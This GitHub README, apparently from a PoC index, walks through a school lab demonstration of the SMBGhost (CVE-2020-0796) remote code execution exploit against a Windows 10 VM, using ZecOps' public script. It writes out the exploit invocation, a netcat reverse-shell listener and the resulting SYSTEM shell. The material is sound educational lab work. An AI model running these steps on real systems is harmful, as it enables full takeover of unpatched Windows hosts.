POC details: 6e16ca5d90b82191f3f177753a788f42b7bcc145

Source
Related vulnerability
Title: Microsoft SMBv3 buffer error vulnerability (CVE-2020-0796)
Description: Microsoft SMBv3 is Microsoft's implementation of version 3 of the Server Message Block (SMB) file-sharing protocol. A buffer error vulnerability exists in Microsoft Server Message Block 3.1.1 (SMBv3): when the SMBv3 protocol handles a malicious compressed packet it takes an incorrect code path. A remote, unauthenticated attacker can exploit this vulnerability to execute arbitrary code. The following products and versions are affected: Microsoft Windows 10 version 1903, Windows Server version 1903, Windows 10 version 1909, Windo
Introduction
# CVE-2020-0796 Exploit Demo (SMBGhost)

This project demonstrates a proof-of-concept (PoC) exploit of CVE-2020-0796, also known as SMBGhost - a critical pre-auth RCE vulnerability affecting Windows 10 and Windows Server systems using SMBv3. This was developed as part of a school cybersecurity project. All exploit code credit goes to ZecOps. I have only used and adapted it for educational purposes to demonstrate exploitation of CVE-2020-0796 within a controlled lab environment.

## Requirements for Demo

To replicate this demonstration, the following setup is required:

### Attacker Machine
- VirtualBox (using **NATNetwork** for VM networking)
- Windows 10 (any recent version)
- Python 3.x (added to system PATH)
- Netcat (included with Nmap or installed separately)
- Exploit script from GitHub PoC:  
  [`SMBleedingGhost.py` by ZecOps](https://github.com/ZecOps/CVE-2020-0796-RCE-POC)

### Target Machine
- VirtualBox (same **NATNetwork** configuration)
- **Windows 10 version 1903, release 19H1**  
  Build 18362.356 – 2019.09, Home or Pro Edition (x64)
- Windows Firewall disabled (so that TCP port 445 on the target is reachable from the attacker VM)
- Offset calculation script from GitHub PoC:  
  [`calc_target_offsets.bat` by ZecOps](https://github.com/ZecOps/CVE-2020-0796-RCE-POC)
  

## Demonstration: Step-by-Step Exploit

### Step 1: Retrieve IP Addresses of Both VMs

1. Launch **Command Prompt** on both the **Attacker** and **Target** virtual machines.
2. Execute the following command in each machine:
   
   ```bash
   ipconfig
   ```
![Screenshot 2025-05-16 172329](https://github.com/user-attachments/assets/8a9a5880-e1d9-42c8-981a-aeaadfb7a022)

3. Take note of the IP addresses of the VMs — you’ll use them in the later steps.

---


### Step 2: Calculate Offsets on Target VM

1. On the **Target VM**, navigate to the `CVE-2020-0796-RCE-POC-master` folder.
2. Double-click to run the script: `calc_target_offsets.bat`

  
- This will generate memory offsets required for the exploit.
- Keep the window open and take note of the values shown — you’ll use them in the next step.

![Screenshot 2025-05-16 172350](https://github.com/user-attachments/assets/31b314b8-c563-400b-b041-57c74d5ba4bd)

---

### Step 3: Update Exploit Script on Attacker VM

1. On the **Attacker VM**, open the same `CVE-2020-0796-RCE-POC-master` folder.
2. Right-click `SMBleedingGhost.py` and open with Notepad.
3. In the `SMBleedingGhost.py` file, scroll down and locate the section that begins with `OFFSETS = {`.
4. Replace the existing offset values with the ones you obtained from the Target VM.
5. Save the file after editing.
6. You may now close the offset window on the Target VM.

![Screenshot 2025-05-16 172403](https://github.com/user-attachments/assets/01dcf451-5dcc-47c8-91bd-216393fe9609)

---

### Step 4: Start Netcat Listener on Attacker VM

Open a new Command Prompt and run:

```bash
ncat -lvp 4321
```

- This sets up a listener on port `4321` to receive a reverse shell from the Target VM upon successful exploitation.
- You can change the port number if needed.

![Screenshot 2025-05-16 172419](https://github.com/user-attachments/assets/e66991f1-6b6c-416c-b649-b8de12ee9da8)

---

### Step 5: Execute Exploit from Attacker VM

1. Open another Command Prompt and navigate to the PoC directory (I saved mine in Desktop):

```bash
cd Desktop
cd CVE-2020-0796-RCE-POC-master
dir
```

2. Run the exploit with the appropriate IPs and port:

```bash
python SMBleedingGhost.py <target_ip> <attacker_ip> <port>
```

![Screenshot 2025-05-16 172450](https://github.com/user-attachments/assets/d465e15a-8af1-4126-a280-254f971035df)

Example used in this demo:

```bash
python SMBleedingGhost.py 192.168.18.61 192.168.18.62 4321
```

- `192.168.18.61`: Target VM IP
- `192.168.18.62`: Attacker VM IP
- `4321`: Port used in the netcat listener

---

### Exploitation Outcome

If successful, the netcat window will show:

```
Microsoft Windows [Version 10.0.18362.356]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
```

This confirms that:
- The exploit succeeded and the Target VM connected back to the listener (the banner shows the target's build, 10.0.18362.356)
- The shell is running on the Target VM with **system-level privileges**

You can validate access by executing:

```bash
whoami
```

This will give:
```
whoami
nt authority\system
```
The shell runs as the local SYSTEM account, the highest privilege level on the Target VM, so the Attacker VM has full control of it.

![Screenshot 2025-05-16 172512](https://github.com/user-attachments/assets/958a569a-f6aa-41b7-8dda-d089b177ef30)

You can also run:
```bash
ipconfig
```
To verify you’re interacting with the Target VM’s network.

![Screenshot 2025-05-16 172550](https://github.com/user-attachments/assets/6b8de42f-1a80-4895-a038-fb652ec87a78)

**Note**: Because the exploit corrupts kernel memory (the vulnerable code lives in the `srv2.sys` driver), the Target VM may blue-screen or otherwise crash after exploitation. If it does, restart it; the attacker session does not survive the reboot and must be re-established by running the exploit again.

## Acknowledgements

This demonstration is based on the publicly available proof-of-concept developed by [ZecOps](https://github.com/ZecOps/CVE-2020-0796-RCE-POC).

## References

- [CVE-2020-0796 Remote Code Execution POC](https://github.com/ZecOps/CVE-2020-0796-RCE-POC)

## Author
[@tdevworks](https://github.com/tdevworks)

## Disclaimer
This repository is created for educational purposes only.

All tools, scripts, and techniques demonstrated are intended to help understand cybersecurity vulnerabilities in a controlled lab environment. Do not attempt to use any of the provided materials on systems or networks that you do not own or have explicit permission to test.

Any misuse of the software will not be the responsibility of the author.

File snapshot

[4.0K] /data/pocs/6e16ca5d90b82191f3f177753a788f42b7bcc145 └── [5.6K] README.md 0 directories, 1 file